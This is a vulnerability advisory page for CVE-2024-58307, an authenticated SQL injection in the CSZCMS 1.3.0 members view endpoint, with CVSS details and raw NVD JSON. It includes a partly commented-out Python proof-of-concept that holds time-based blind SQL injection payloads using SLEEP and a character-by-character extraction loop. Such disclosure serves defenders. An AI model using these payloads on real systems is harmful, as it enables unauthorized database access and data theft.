Security Vulnerability Report
CVE-2024-58307 CVSS 8.8 HIGH

CVE-2024-58307

Published: 2025-12-11 22:15:52
Last Modified: 2025-12-22 18:40:41

Description

CSZCMS 1.3.0 contains an authenticated SQL injection vulnerability in the members view functionality that allows authenticated attackers to manipulate database queries. Attackers can inject malicious SQL code through the view parameter to potentially execute time-based blind SQL injection attacks and extract database information.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:cszcms:csz_cms:1.3.0:*:*:*:*:*:*:* - VULNERABLE
CSZCMS 1.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import time
import string

# CVE-2024-58307 SQL Injection PoC for CSZCMS 1.3.0
# Authenticated time-based blind SQL injection via view parameter

target_url = "http://target.com/cszcms/index.php/members/view"

# Login first to obtain session cookie
login_url = "http://target.com/cszcms/index.php/login"
login_data = {
    "username": "attacker",
    "password": "password123"
}

session = requests.Session()
# login_response = session.post(login_url, data=login_data)
# cookies = login_response.cookies

# SQL Injection payload example - time-based blind
# This payload tests if SQL injection is possible by introducing a 5-second delay
injection_payload = "1' AND (SELECT * FROM (SELECT SLEEP(5))a) AND '1'='1"

params = {
    "view": injection_payload
}

# Send malicious request
# response = session.get(target_url, params=params, cookies=cookies)


# Data extraction example (pseudo-code)
def extract_data_via_blind_sql():
    """
    Blind SQL injection data extraction logic
    Uses binary search to efficiently extract data character by character
    """
    charset = string.ascii_lowercase + string.digits + "_@."
    extracted = ""
    # Example: Extract database user
    # for i in range(1, 50):
    #     for char in charset:
    #         payload = f"1' AND IF(SUBSTRING(USER(),{i},1)='{char}',SLEEP(2),0) AND '1'='1"
    #         start = time.time()
    #         # Make request and measure response time
    #         if response_time > threshold:
    #             extracted += char
    #             break
    return extracted


print("PoC for CVE-2024-58307 - CSZCMS SQL Injection")
print("Target: CSZCMS 1.3.0")
print("Vulnerability: Authenticated SQL Injection in members view endpoint")
```

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-58307", "sourceIdentifier": "[email protected]", "published": "2025-12-11T22:15:52.173", "lastModified": "2025-12-22T18:40:40.883", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CSZCMS 1.3.0 contains an authenticated SQL injection vulnerability in the members view functionality that allows authenticated attackers to manipulate database queries. Attackers can inject malicious SQL code through the view parameter to potentially execute time-based blind SQL injection attacks and extract database information."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", 
"Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cszcms:csz_cms:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "B83DE2F9-E5FF-4A78-A40C-AB8CFF373992"}]}]}], "references": [{"url": "https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.3.0.zip/download", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.cszcms.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51916", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/cszcms-authenticated-sql-injection-via-members-view-endpoint", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}